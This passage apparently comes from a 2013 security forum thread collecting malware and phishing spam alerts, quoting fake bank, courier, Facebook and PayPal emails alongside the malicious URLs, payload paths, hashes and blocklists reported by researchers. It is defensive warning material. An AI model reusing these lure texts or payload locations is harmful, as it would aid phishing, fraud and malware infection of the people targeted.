Business Day: 19-Aug-2013
Net Batch Total: 3704.75 (USD)
Number of Charge Transactions: 1
Amount of Charge Transactions: 3704.75
Number of Refund Transactions: 5
Amount of Refund Transactions: 315.74
You can download your full report ...

- https://www.virustotal.com/en/ip-address/72.5.102.146/information/
___

Fake Malwarebytes scammer surveys ...
- http://blog.malwarebytes.org/news/2013/08/fake-malwarebytes-scammer-surveys-victims/
August 20, 2013 - "... a twitter account pretending to be speaking for Malwarebytes. The twitter account, @ malwarebytesx, has posted heavily over the last couple days about Malwarebytes Anti-Malware being available (both legitimately and a cracked version) at a posted link. They even created a variation of our logo and got 51 people to follow them! The link leads to a blogspot page titled “Malwarebytes Anti-Malware 1.75 Full + Serial” that is covered in our signage and provides a link to download “Malwarebytes Anti-Malware” with text and graphics directly from our own website.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/08/MalwareAMBlog-1024x810.png
After clicking on the “Download Now” button, you are presented with a download page requesting a small favor.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/08/MalwareAMOFfer.png
... Unfortunately for anyone who has fallen for this scam, this website does -not- belong to Malwarebytes nor is supported by one of our authorized distributors... Don’t become a victim and always download software from legitimate sites. Even if you just Google “Malware” or the phrase “Malware Removal,” legitimate sources to download our product are within the first few results. Tell your friends and if you encounter a survey site, maybe you should try finding your download somewhere else..."
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Malicious Attachment Email Messages - 2013 Aug 21
Fake Secure Message Notification Email Messages - 2013 Aug 21
Fake Confirmation of Payment Information Email Messages - 2013 Aug 21
Fake Money Transfer Notification Email Messages - 2013 Aug 21
Malicious Personal Pictures Attachment Email Messages - 2013 Aug 21
Fake UPS Parcel Notification Email Messages - 2013 Aug 21
Fake Product Solicitation Email Messages - 2013 Aug 21
Fake Product Purchase Request Email Messages - 2013 Aug 21
Fake Money Transfer Notification Email Messages - 2013 Aug 21
(More detail and links at the cisco URL above.)
___

Fake Facebook SPAM / thenatemiller.co
- http://blog.dynamoo.com/2013/08/facebook-spam-thenatemillerco.html
21 August 2013 - "This fake Facebook spam leads to malware on thenatemiller .co:
Date: Wed, 21 Aug 2013 22:05:38 +0530 [12:35:38 EDT]
From: Facebook [update+hiehdzge@ facebookmail .com]
Subject: You requested a new Facebook password
facebook
Hello,
You recently asked to reset your Facebook password.
Click here to change your password.
Didn't request this change?
If you didn't request a new password, let us know immediately.
Change Password
This message was sent to [redacted] at your request.
Facebook, Inc., Attention: Department 415, PO Box 10005, Palo Alto, CA 94303

Nothing good will come from clicking the link. First victims go to a legitimate but -hacked- site that attempts to load the following three scripts:
[donotclick]gemclinicstore .com/admitted/tintinnabulations.js
[donotclick]mathenyadvisorygroup .com/toffies/ceiling.js
[donotclick]www.it-planet .gr/schlepped/suitor.js
From there the victim is directed to a malware landing page at [donotclick]thenatemiller .co/topic/able_disturb_planning.php (.co, not .com) which is a hijacked GoDaddy domain hosted on 72.5.102.146 (Nuclear Fallout Enterprises, US) along with several other hijacked domains...
Recommended blocklist:
72.5.102.146
successchamp .com
dennissellsgateway .com
thenatemiller .co
thenatemiller .info
justinreid .us
waterwayrealtyteam .us
thenatemiller .biz
gemclinicstore .com
mathenyadvisorygroup .com
www.it-planet .gr ..."

- https://www.virustotal.com/en/ip-address/72.5.102.146/information/

:mad: :fear:

AplusWebMaster
2013-08-22, 22:45
FYI...

Fake Red Sox Baseball SPAM / lindoliveryct .net
- http://blog.dynamoo.com/2013/08/red-sox-baseball-spam-lindoliveryctnet.html
22 Aug 2013 - "This fake Red Sox spam leads to malware on lindoliveryct .net:
Date: Thu, 22 Aug 2013 13:02:19 -0400 [13:02:19 EDT]
From: ticketoffice@ inbound.redsox .com
Subject: Thank You for your order. ( RSXV - 4735334 - 0959187 )
Thank you for your recent ticket purchase. We truly appreciate your support and commitment to Red Sox Baseball. If you have any questions regarding your purchase, please contact our Ticket Services department by calling (toll free) 877-REDSOX9.
Note that you will receive a separate email within the next two business days which will include the vouchers you will need for both parking at the Prudential Center and your Duck Boat ride to the ballpark, included in each End of Summer Family Pack purchase.
Please remember that all sales are final-there are no refunds or exchanges issued on any tickets. Also note that all game times are subject to change. Be sure to visit redsox.com for the latest Red Sox news and any game time updates.
Thanks again! We look forward to seeing you at the ballpark this season.
Boston Red Sox Ticketing Department...

Screenshot: https://1.bp.blogspot.com/-B_1VXJv600M/UhZUOCcg2NI/AAAAAAAABy0/pskZHcKamYw/s1600/redsox.png

The link goes through a legitimate -hacked- site (in this case using a WordPress flaw) and ends up on [donotclick]www.redsox .com.tickets-service.lindoliveryct.net/news/truck-black.php (report here*) which is actually the domain lindoliveryct .net rather than redsox .com... The WHOIS details for this domain are fake and indicate it is the work of the Amerika gang...
The malicious domain is multihomed on the following IPs which host several other malicious domains:
66.230.163.86 (Goykhman And Sons LLC, US)
86.183.191.35 (BT, UK)
188.134.26.172 (Perspectiva Ltd, Russia)
Recommended blocklist:
66.230.163.86
86.183.191.35
188.134.26.172 ..."
* http://urlquery.net/report.php?id=4682777
___

Chase Bank Remittance Spam
- http://threattrack.tumblr.com/post/59019303653/chase-bank-remittance-spam
Aug 22, 2013 - "Subjects Seen:
Remittance Docs <random>
Typical e-mail details:
Please find attached the remittance If you are unable to open the attached file, please reply to this email with a contact telephone number.
The Finance Dept will be in touch in due course.
Vanessa_Rodriquez
Chase Private Banking

Malicious URLs
watch-fp .ca/ponyb/gate.php
watch-fp .com/ponyb/gate.php
watch-fp .info/ponyb/gate.php
watch-fp .mobi/ponyb/gate.php
jatw.pacificsocial .com/VSMpZX.exe
richardsonlookoutcottages .nb .ca/Q5Vf.exe
riplets .net/Qa7nXVT.exe

Malicious File Name and MD5:
Docs_<name>.zip (37A1C5AC9C0090A07F002B0A2ED57D3D)
Docs_<date>.exe
(E9FBB397E66B295F5E43FE0AA3B545D7)

- Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/95eb6272862e0babe9ce34ae12e67471/tumblr_inline_mrxy44WuCD1qz4rgp.png
___

Discover Card Account Information Update Spam
- http://threattrack.tumblr.com/post/59025861611/discover-card-account-information-update-spam
Aug 22, 2013 - "Subjects Seen:
Your account login information updated
Typical e-mail details:
Dear Customer,
This e-mail is to confirm that you have updated your log-in information for Discover.com. Please remember to use your new information the next time you log in.
Log In to review your account details or to make additional changes.

Malicious URLs
aywright .com/parables/index.html
intuneuk .com/aspell/index.html
flagitak .poznan.pl/deceptiveness/index.html
carpentryunlimitedvermont .com/slangy/index.html
labs-srl .it/misquotations/index.html
75.103.99.168 /superintend/index.html
watch-fp .ca/topic/able_disturb_planning.php

- Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/cc1d603ab8252f6a9904c26826e4f11b/tumblr_inline_mry2hgeDjI1qz4rgp.png

- http://blog.dynamoo.com/2013/08/discover-card-your-account-login.html
22 August 2013 - "This fake Discover card spam leads to malware on abemuggs .com:
Date: Thu, 22 Aug 2013 16:14:59 +0000 [12:14:59 EDT]
From: Discover Card [no-reply@ facebook .com]
Subject: Your account login information updated
Discover
Access My Account
ACCOUNT CONFIRMATION Statements | Payments | Rewards
Your account login information has been updated.
Dear Customer,
This e-mail is to confirm that you have updated your log-in information for Discover.com. Please remember to use your new information the next time you log in.
Log In to review your account details or to make additional changes...

Screenshot: https://3.bp.blogspot.com/-yFKra6yjZxQ/UhZqLgXefaI/AAAAAAAABzM/PbOV1lEPdbE/s1600/discover-card2.png

The link in the email uses the Twitter redirection service to go to [donotclick]t. co/9PsnfeL8hh then [donotclick]x .co/1neIk then [donotclick]activegranite.com/vocatives/index.html and finally to a set of three scripts as follows:
[donotclick]02aa198 .netsolhost .com/frostbite/hyde.js
[donotclick]96.9.28.44 /dacca/quintilian.js
[donotclick]cordcamera.dakisftp .com/toothsome/catch.js
From this point the victim ends up at the malicious payload at [donotclick]abemuggs .com/topic/able_disturb_planning.php which is a hijacked GoDaddy domain hosted on 74.207.253.139 (Linode, US).
At the moment, I can only see abemuggs .com active on 74.207.253.139, however other domains in the same GoDaddy account may be hijacked as well. If you see unexpected traffic going to the following domains then it may be malicious:
abemuggs .com
abesmugs .com
abemugs .com
andagency .com
mytotaltitle .com
I would strongly recommend the following blocklist:
74.207.253.139
96.9.28.44
abemuggs .com
02aa198.netsolhost .com
cordcamera.dakisftp .com "

- https://www.virustotal.com/en/ip-address/74.207.253.139/information/

- https://www.virustotal.com/en/ip-address/96.9.28.44/information/
___

Fake Remittance Docs SPAM / Docs_08222013_218.exe
- http://blog.dynamoo.com/2013/08/remittance-docs-2982780-spam.html
22 August 2013 - "This fake Chase spam has a malicious attachment:
Date: Thu, 22 Aug 2013 10:00:33 -0600 [12:00:33 EDT]
From: Jed_Gregory [Jed_Gregory@ chase .com]
Subject: Remittance Docs 2982780
Please find attached the remittance 2982780.
If you are unable to open the
attached file, please reply to this email with a contact telephone number. The
Finance Dept will be in touch in due course. Jed_Gregory
Chase Private Banking Level III Officer
3 Times Square
New York, NY 10036 ...

The attachment is in the format Docs_victimdomain .com.zip which contains an executable Docs_08222013_218.exe (note that the date is encoded into the file). The VirusTotal detection rate for this is a moderate 16/46*. The Malwr analysis** shows that this is a Pony/Gate downloader which attempts to connect to the following URLs:
[donotclick]watch-fp .ca/ponyb/gate.php
[donotclick]www.jatw.pacificsocial .com/VSMpZX.exe
[donotclick]richardsonlookoutcottages .nb .ca/Q5Vf.exe
[donotclick]idyno.com .au/kvdhx2.exe
The downloader then downloads a second part with a much lower detection rate of 6/46***. This appears to be a Zbot variant... The Pony/Gate component is hosted on 72.5.102.146 (Nuclear Fallout Enterprises, US) and is a hijacked GoDaddy domain, one of several on that server...
Recommended blocklist:
72.5.102.146 ..."
* https://www.virustotal.com/en/file/d4ef6d13b24a41dc7f10ef93b0c4580a1553d8512a7a97b3c32b25b0d49ab464/analysis/1377201922/

** https://malwr.com/analysis/YTNiNzMwZjUyZjMxNGE4ODhmNDJlZGFiYjY4YjU3ZmY/

*** https://www.virustotal.com/en/file/33f5e03f5d35274f58cb67fff503b0d9087c73d1019fedbf4261938b7e441d1d/analysis/1377202683/

- https://www.virustotal.com/en/ip-address/72.5.102.146/information/

:fear: :mad:

AplusWebMaster
2013-08-23, 20:43
FYI...

Fake Wells Fargo SPAM / WellsFargo_08232013.exe
- http://blog.dynamoo.com/2013/08/wells-fargo-spam-wellsfargo08232013exe.html
23 August 2013 - "This fake Wells Fargo spam has a malicious attachment:
Date: Fri, 23 Aug 2013 09:43:44 -0500 [10:43:44 EDT]
From: Morris_Osborn@ wellsfargo .com
Please review attached documents.
Morris_Osborn
Wells Fargo Advisors
817-718-8096 office
817-610-5531 cell Morris_Osborn@ wellsfargo .com
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
Wells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member
FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103...

In this case there is an attachment WellsFargo.victimname.zip which contains a malicious executable WellsFargo_08232013.exe (note the date is encoded into the filename). The VirusTotal detection rate is just 4/45*, but the file itself is unusually small (just 21Kb unzipped, 8Kb zipped) when I would normally expect to see the executable closer to 100Kb for this sort of malware. What does it do? Well, the automated reports show it rummaging through various browser and address book data, and the ThreatTrack report [pdf**] shows a DNS lookup of the domain huyontop.com plus what appears to be some peer-to-peer activity... The WHOIS details for the domain huyontop .com appear to be valid (I won't list them here, look them up if you want), however it was only registered a few days ago. I can't tell you exactly what it is doing, but I would treat huyontop .com as being potentially malicious and block it if you can."
* https://www.virustotal.com/en/file/b4d8e2fdb88a3d94dd421e5f0a016cb9cd37e202bc57b7cad5ecd091c6335759/analysis/1377272785/

** http://www.dynamoo.com/files/analysis_32325_00949d04acead6bc20e1bc1acd09feb3.pdf

- https://www.virustotal.com/en/ip-address/216.194.165.222/information/
___

Orbit Downloader - DDoS component found
- https://net-security.org/malware_news.php?id=2570
Aug 23, 2013 - "... The DDoS component has been discovered by ESET researchers* while doing a routine examination of the software, and subsequent analysis of previous versions has shown that it was added to orbitDM.exe sometime between the release of version 4.1.1.14 (December 25, 2012) and version 4.1.1.15 (January 10, 2013)... ESET has decided to make its AV software detect all versions of Orbit Downloader with DoS functionality. Trend Micro, Kaspersky Land and Ikarus decided to follow suit, at least for the latest version of OD. Users are advised to deinstall the software and choose another one for their needs."

* http://www.welivesecurity.com/2013/08/21/orbital-decay-the-dark-side-of-a-popular-file-downloading-tool/
21 Aug 2013

** https://www.virustotal.com/en/file/18756d11b3c62654e2409d1340a8114fbd471f114420e5ba7735a7363cf23ec6/analysis/

:mad::fear:

AplusWebMaster
2013-08-27, 02:28
FYI...

Fake UPS SPAM / UPS Invoice 74458652.zip
- http://blog.dynamoo.com/2013/08/ups-spam-ups-invoice-74458652zip.html
26 August 2013 - "This fake UPS invoice has a malicious attachment:
From: "UPSBillingCenter @ups .com" [UPSBillingCenter@ ups .com]
Subject: Your UPS Invoice is Ready
New invoice(s) are available for the consolidated payment plan(s) / account(s) enrolled in the UPS Billing Center. Download the attachment. Invoice will be automatically shown by double click.

Attached is a file UPS Invoice 74458652 which in turn contains a file called UPS Invoice {DIGIT[8]}.exe which presumably isn't meant to be named like that..
The VirusTotal detection rate is a so-so 18/46*. The Malwr analysis** is that this is a trojan downloader that attempts to download bad things from the following locations:
[donotclick]gordonpoint .org/forum/viewtopic.php
[donotclick]mierukaproject .jp/PjSE.exe
[donotclick]programcommunications .com/WZP3mMPV.exe
[donotclick]fclww .com/QdytJso0.exe
[donotclick]www .lajen .cz/tPT8oZTB.exe
The VirusTotal detection rate for the downloaded file is not great at just 9/46***.
The domain gordonpoint .org is a hijacked GoDaddy domain on 74.207.229.45 (Linode, US) along with several other -hijacked- domains...
Recommended blocklist:
74.207.229.45
gordonpoint .org
hitechcreature .com
industryseeds .ca
infocreature .com
itanimal .com
itanimals .com
jngburgerjoint .ca
jngburgerjoint .com
johnmejalli .com
mierukaproject .jp
programcommunications .com
fclww .com
www .lajen .cz "
* https://www.virustotal.com/en/file/34f66782c3e014a66c4600b3ff41d14ebd98a435c16d01feb5964b21364c13ae/analysis/1377553766/

** https://malwr.com/analysis/NTE2MGRjODQzNTQzNGQ2NjliZDVhYjgxYzUzY2NlOTg/

*** https://www.virustotal.com/en/file/d9125bca0f771f43db6f50d5877c9f45d0e6bed83331fb71597bfbb98ee8d0c6/analysis/1377552510/

- https://www.virustotal.com/en/ip-address/74.207.229.45/information/
___

PayPal Protection Services Spam
- http://threattrack.tumblr.com/post/59424449055/paypal-protection-services-spam
Aug 26. 2013 - "Subjects Seen:
Resolution of case #<random>
Typical e-mail details:
Our records indicate that you never responded to requests for additional information about this claim. We hope you review the attached file and solve the situation amicably.
For more details please see on the page View all details
Sincerely,
Protection Services Department

Malicious URLs
8744f321834af6ba.lolipop .jp/monetary/index.html
scentsability .org/interlocks/index.html
batcoroadlinescorporation .com/misfire/index.html
gordonpoint .org/topic/able_disturb_planning.php

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/cb09707a608c8202a7eab7570db2f066/tumblr_inline_ms5pg88gPk1qz4rgp.png

:fear::fear::mad:

AplusWebMaster
2013-08-27, 23:45
FYI...

Fake email - Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake FedEx Parcel Delivery Failure Notification Email Message - 2013 Aug 27
Fake Money Transfer Notification Email Messages - 2013 Aug 27
Fake Bank Payment Notice Email Messages - 2013 Aug 27
Fake Account Payment Notification Email Messages - 2013 Aug 27
Fake Bank Payment Transfer Notification Email Messages - 2013 Aug 27
Fake Package Shipping Notification Email Messages - 2013 Aug 27
Fake Business Complaint Notification Email Messages - 2013 Aug 27
Fake Tax Return Information Email Messages - 2013 Aug 27
Email Messages with Malicious Attachments - 2013 Aug 27
Fake Product Purchase Order Request Email Messages - 2013 Aug 27
Fake Tax Documentation Email Messages - 2013 Aug 27
Fake Product Services Specification Request Email Messages - 2013 Aug 27
(More detail and links at the cisco URL above.)
___

UPS Email scam delivers Backdoor
- http://blog.trendmicro.com/trendlabs-security-intelligence/convincing-ups-email-scam-delivers-backdoor/
Aug 27, 2013 - "... most users can easily detect spammed messages, particularly those that attempt (and fail) at looking like legitimate email notifications... We recently found an email sample spoofing the popular mail courier service UPS. The email poses as a package delivery notification, containing links to the tracking site and .PDF copy of the shipping invoice. This is definitely not the first time we received such an email. However, what makes this spam stand out is the way it hides its true, malicious intent.
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/08/ups_spamrun_825.png
As seen in the email screenshot above, the malware-hosting site is hyperlinked to the legitimate UPS URL where the .PDF version of the shipping invoice can be downloaded. For users, this URL may seem safe; however, when they clicked the URL it leads to the downloading of the malicious ZIP file. To further convince users of its legitimacy, the recipient’s email address were created to closely resemble the actual UPS email address. The ZIP file contains a malicious file which Trend Micro detects as BKDR_VAWTRAK.A. This backdoor steals stored information in several FTP clients or file manager software. In addition, BKDR_VAWTRAK.A also steals email credentials from Outlook, PocoMail, IncrediMail, Windows Live Mail, and The Bat! among others. In order to avoid detection on the system, this backdoor deletes certain registry keys related to Software Restriction Policies... this attack was moderate in number, constituting approximately 1 in every 300-400 thousand spam on the day of the outbreak based on the estimate. To give this a baseline of comparison, the recent Royal Baby spam outbreak consisted of 1 in every 200 spam on the days of that outbreak. This email campaign also appears to be targeting specific organizations, which stresses the importance of social engineering training and how to make it effective in a workplace setting. This includes training like “social” penetration training, which is basically having someone play an attacker and attempt to lure employees via social engineering..."

:fear: :mad:

AplusWebMaster
2013-08-28, 18:06
FYI...

High Profile Domains under Siege
- http://blog.opendns.com/2013/08/27/high-profile-domains-under-siege/
August 27, 2013 - "We are actively seeing several high profile domains being -hijacked- at the DNS level and are actively blocking all requests from the apparent attackers’ name servers. The attacker looks to have compromised domain name registrar MelbourneIT. Reported domains include Share This, Twitter, Huffington Post, and the New York Times. We’re not linking to those sites for obvious reasons. The IP addresses and domains that have been involved in -redirection- have been blocked by OpenDNS... We are now blocking all requests that are coming from the known bad name servers... screenshots show the bad name server, 141.105.64.37, which is currently hosting domains including malware and phishing along with the domains affected by today’s attack..."
(Screenshots at the opendns URL above.)

- https://www.virustotal.com/en/ip-address/141.105.64.37/information/

- https://isc.sans.edu/diary.html?storyid=16451
Last Updated: 2013-08-27 21:09:58 UTC

- http://www.theregister.co.uk/2013/08/27/twitter_ny_times_in_domain_hijack/
27 August 2013

- http://arstechnica.com/security/2013/08/twitter-and-new-york-times-clash-with-hackers-for-control-of-their-sites/
Aug 27 2013, 10:10pm EST

:mad: :fear:

AplusWebMaster
2013-08-29, 15:38
FYI...

Sendori software update - malware...
- https://isc.sans.edu/diary.html?storyid=16466
Last Updated: 2013-08-29 04:27:07 UTC - "Reader Kevin wrote in to alert us of an interesting discovery regarding Sendori. Kevin stated that two of his clients were treated to malware via the auto-update system for Sendori. In particular, they had grabbed Sendori-Client-Win32/2.0.15 from 54.230.5.180 which is truly an IP attributed to Sendori via lookup results. Sendori's reputation is already a bit sketchy; search results for Sendori give immediate pause but this download in particular goes beyond the pale. With claims that "As of October 2012, Sendori has over 1,000,000 active users" this download is alarming and indicates something else is likely afoot with Sendori's site and/or updater process. The URL path (to be considered hostile) is: hxxp ://upgrade.sendori .com/upgrade/2_0_16/sendori-win-upgrader.exe...
VirusTotal results currently nine malware hits (9/46*). Malwr results** are rather damning, and as Kevin stated, Zeus-like... Other filenames for this sample as seen in the wild:
sendori-win-upgrader.exe
SendoriSetup-2.0.15.exe
update_flash_player.exe
14542884
output.14542884.txt
Update_flash_player.exe ...
Sendori replied to Kevin's notification with; they are engaged and investigating:
'Hi Kevin, we have engaged our network and security team. They will analyze and take appropriate action to resolve this issue. They will contact if they need any additional information from you.
Thanks again for bringing this to our notice.
Thanks Sendori Support team' ...
Comment(1): I checked again this morning and the file sendori-win-upgrader.exe they are hosting has now changed to a smaller version with MD5 771f2382ce00d6f8378f56510fa0da43.
I was hoping that meant the Sendori folks cleaned things up but VirusTotal still throws 4 malware hits on the file, and a fresh Malwr analysis looks as evil as before. It looks like whoever is exploiting Sendori's auto-update system has just "freshened up" the file for better AV evasion. I updated my ticket with Sendori Support. My first sighting of this issue was on 2013-08-28 at 4:58pm EST when my first client was nailed with it.
Kevin Branch..."

... sendori .com/consumer_problem.html
"Sendori software works in tandem with web browsers to dramatically speed access to tens of thousands of the most popular websites..."

* https://www.virustotal.com/en/file/11bd844bbea32f6d15107373f42c7a16eee991ec1b6c205bcb4cf768d70b441d/analysis/

** https://malwr.com/analysis/Y2E4ZDlkMzQ5MjkyNDdmYjhhNjhmZDVlMDcyMjk2NGU/
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake eFax Message Notification Email Messages - 2013 Aug 29
Fake Account Payment Notification Email Messages - 2013 Aug 29
Fake Purchase Order Request Email Messages - 2013 Aug 29
Fake Payment Notification Email Messages - 2013 Aug 29
Fake Payment Information Email Messages - 2013 Aug 29
Fake Shipping Information Email Messages - 2013 Aug 29
Fake Product Order Email Messages - 2013 Aug 29
Fake Account Information Request Email Messages - 2013 Aug 29
Fake Photo Sharing Email Messages - 2013 Aug 29
Fake Product Purchase Request Email Messages - 2013 Aug 29
Fake Invoice Notification Email Messages - 2013 Aug 29
Fake Payment Notification Email Messages - 2013 Aug 29
Email Messages with Malicious Attachments - 2013 Aug 29
Fake Account Deposit Notification Email Messages - 2013 Aug 29
Fake Package Delivery Failure Notification Email Messages - 2013 Aug 29
Fake Product Services Specification Request Email Messages - 2013 Aug 29
Fake Product Purchase Order Email Messages on August 28, 2013 - 2013 Aug 29
Malicious Personal Pictures Attachment Email Messages - 2013 Aug 29
Fake Scanned Document Attachment Email Messages - 2013 Aug 29
(More detail and links at the cisco URL above.)

:mad::mad: :fear:

AplusWebMaster
2013-08-30, 19:24
FYI...

Visa/PayPal Spam
- http://threattrack.tumblr.com/post/59770780239/visa-paypal-spam
Aug 30, 2013 - "Subjects Seen:
Resolution of case #PP<random>
Typical e-mail details:
Dear Visa card holder,
Our records indicate that you never responded to requests for additional information about this claim. We hope you review the attached file and solve the situation amicably.
For more details please see on the page View all details on the Usa.visa.com/personal/
Visa does not tolerate fraud or illegal activities. Your complaint has been noted in the record of the Visa card holder you reported. If we find this user has violated our policies, we will investigate and take appropriate action. If this occurs, you may be contacted in the future about the status of this complaint.
To make sure future transactions proceed smoothly, we suggest you visit the PayPal site and click the Security Center link located at the top of any page. There you will find tips on how to avoid fraudulent sellers in the “Fraud Prevention Tips for Buyers” section.

Malicious URLs
dp56148868.lolipop .jp/brassing/index.html
rossizertanna .it/occupancy/index.html
abesgrillnbar .com/topic/able_disturb_planning.php

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/6b4311944316d5383c145d75adb41405/tumblr_inline_msci80fxum1qz4rgp.png
___

Paychex Insurance Spam
- http://threattrack.tumblr.com/post/59780780295/paychex-insurance-spam
Aug 30, 2013 - "Subjects Seen:
Paychex Insurance Agency
Typical e-mail details:
The security of your personal information is of the utmost importance to Paychex, so we have sent the attached as a secure electronic file.
For more details please see on the page. View all details »
Note: The attached file contains encrypted data. In order to view the file, you must have already installed the decryption software that was previously provided by Paychex.
If you have any question please call us at 800-472-0072, option 4. Representatives are available to assist you Monday through Thursday between 8:00 a.m. and 8:00 p.m. ET and Friday between 8:00 a.m. and 6:00 p.m. ET.
Paychex Insurance Agency

Malicious URLs
ftp(DOT)willetthofmann .com/logistically/index.html
ftp(DOT)willetthofmann .com/shadiest/index.html
abesonthego .com/topic/able_disturb_planning.php

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f18448ee24343c4fee8bc51c0e2416dc/tumblr_inline_mscq91NzEx1qz4rgp.png
___

Federal Reserve Suspicious Activity Spam
- http://threattrack.tumblr.com/post/59791687246/federal-reserve-suspicious-activity-spam
Aug 30. 2013 - "Subjects Seen:
FW: IMPORTANT - Suspicious Activity <random>
Typical e-mail details:
Greetings, addressing you is Ariel Howe, Superior Accounting Officer at Federal Reserve. We have received an inquiry from your Financial Institution regarding an incoming money transfer from Harvey Norman Holdings Ltd. retail with concern on the company’s current activity which is valued as “High Risk Activity”. In order to release the funds to your account please complete the attached form “IIMT Form 401”.
Please note if no further action will be taken the funds will be remain locked in the Federal Reserve System or returned to the Money transfer initiator.
Ariel Howe
Superior Accounting Officer
Office of Inspector General
c/o Board of Governors of the Federal Reserve System

Malicious File Name and MD5:
Case_<random>.zip (35C95C02EB974CA2302D2BA3EB7E5322)
Case_<date>.exe (F9A37404F1150C48AEC238BAC44977FC)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/3d7169caf0ef1841e4365d4763f60ab2/tumblr_inline_mscxwbY9v51qz4rgp.png

:mad::fear::sad:

AplusWebMaster
2013-09-02, 16:27
FYI...

Malware sites to block 2/9/13
- http://blog.dynamoo.com/2013/09/malware-sites-to-block-2913.html
2 Sep 2013 - "These IPs and domains are associated with this gang* and should all be considered as malicious. This list follows on from this earlier one**..."
(Long list of IPs at the dynamoo URL above.)
* http://blog.dynamoo.com/search/label/Amerika

** http://blog.dynamoo.com/2013/08/malware-sites-to-block-19813.html
___

Fake Facebook SPAM / london-leather .com
- http://blog.dynamoo.com/2013/09/facebook-spam-london-leathercom.html
2 Sep 2013 - "This fake Facebook spam leads to malware on london-leather .com:
Date: Mon, 2 Sep 2013 19:59:52 +0300 [12:59:52 EDT]
From: Facebook [update+hiehdzge @facebookmail .com]
Subject: Victoria Carpenter commented on your status...
Hello,
Victoria Carpenter commented on your status.
Victoria wrote: "so cute"
Go to comments
Reply to this email to comment on this status.
See Comment
This message was sent to [redacted]...

In this case the link in the spam appears to use some sort of URL shortening service, first going to [donotclick]jdem .cz/5xxb8 then [donotclick]93.93.189.108 /exhortation/index.html where it attempts to load one of the following three scripts:
[donotclick]codebluesecuritynj .com/mummifies/stabbed.js
[donotclick]mobileforprofit .net/affected/liberal.js
[donotclick]tuviking .com/trillionth/began.js
These scripts in turn direct the visitor to a malicious payload site at [donotclick]london-leather .com/topic/able_disturb_planning.php which is a hijacked GoDaddy domain hosted on 173.246.104.184 (Gandi, US) which hosts a number of malicious domains, also hijacked from GoDaddy...
Recommended blocklist:
173.246.104.184
london-leather .com
kitchenwalla .com
kidswalla .com
jerseyluggage .com
jerseycitybags .com
kiddypals .com
kennethcolenyoutlet .com
codebluesecuritynj .com
mobileforprofit .net
tuviking .com"

- https://www.virustotal.com/en/ip-address/173.246.104.184/information/
___

MONK SPAM tries to profit from WAR threat
- http://blog.dynamoo.com/2013/09/monk-spam-tries-to-profit-from-war.html
2 Sep 2013 - "The MONK (Monarchy Resources Inc) pump-and-dump spam continues*. This time though, the spammers are trying to capitalise on the threat of war in the Middle East:
From: belova04@ jeel .com
Date: 2 September 2013 17:32
Subject: This Stock just released Big News!
Are you interested in enriching yourself by means of war? It`s the very
time to do it! As soon as the first bombs get to the earth in Syria,
stone oil prices will move up the same as MONARCHY RESOURCES INC
(M-ON_K) share price. Go make money on Mon, Sep 2, 2013, get M-ON_K
shares!!!...

As previously discussed*, the stock price for this company has tanked** and is unlikely to get any better. If you attempt to do some war profiteering on this stock then you will lose out, and frankly you won't get any sympathy from me. Here are some other variants of the same scummy email:

You can make money on war!!! It`s right time to make it. The
moment the first rockets descend to Syria, oil prices will
rise the same as MONARCHY RESOURCES INC. (M O N_K) bond
price!!! Begin earning profits on Monday, September 02, 2013,
grab M O N_K shares.
It`s your turn to make money on war! It`s the very time to make it.
As soon as the first bombs touch the ground in Syria, black gold
prices will skyrocket as well as MONARCHY RESOURCES, INC (M-O-N K)
bond price. Start making money on Mon, Sep 02, 2013, get M-O-N K
shares...

* http://blog.dynamoo.com/2013/08/monk-monarchy-resources-inc-pump-and.html

** http://www.nasdaq.com/symbol/monk/interactive-chart?timeframe=1y&charttype=line

:mad: :fear::fear:

AplusWebMaster
2013-09-03, 14:23
FYI...

Fake PayPal SPAM / londonleatheronline .com
- http://blog.dynamoo.com/2013/09/paypal-spam-londonleatheronlinecom.html
3 Sep 2013 - "This fake PayPal spam leads to malware on londonleatheronline .com:
Date: Tue, 3 Sep 2013 09:43:09 +0400 [01:43:09 EDT]
From: PayPal [service@ int .paypal .com]
Subject: Identity Issue #PP-716-472-864-836
We are writing you this email in regards to your PayPal account. In accordance with our "Terms and Conditions", article 3.2., we would like to kindly ask you to confirm your identity by completing the attached form.
Please print this form and fill in the requested information. Once you have filled out all the information on the form please send it to verification@ paypal .com along with a personal identification document (identity card, driving license or international passport) and a proof of address submitted with our system ( bank account statement or utility bill ).
For more details please see on the page View all details
Your case ID for this reason is PP-U3PR33YIL8AV
For your protection, we might limit your account access. We apologize for any inconvenience this may cause.
Thanks,
PayPal ...

The link in the email goes to a legitimate -hacked- site and then loads one of these three scripts:
[donotclick]ftp.casacalderoni .com/liquids/pythias.js
[donotclick]tuviking .com/trillionth/began.js
[donotclick]walegion.comcastbiz .net/wotan/reuses.js
These scripts then try to deliver the victim to a malicious payload at [donotclick]londonleatheronline .com/topic/able_disturb_planning.php which is a hijacked GoDaddy domain hosted on 173.246.104.184 (Gandi, US) which is the same server as used in this attack* ...
Recommended blocklist:
173.246.104.184
jerseycitybags .com
jerseyluggage .com
kennethcolenyoutlet .com
kiddypals .com
kidswalla .com
kitchenwalla .com
london-leather .com
londonleatheronline .com
ftp.casacalderoni .com
tuviking .com
walegion.comcastbiz .net "
* http://blog.dynamoo.com/2013/09/facebook-spam-london-leathercom.html

- https://www.virustotal.com/en/ip-address/173.246.104.184/information/
___

Breaking Bad Spam lurks - note pasting site
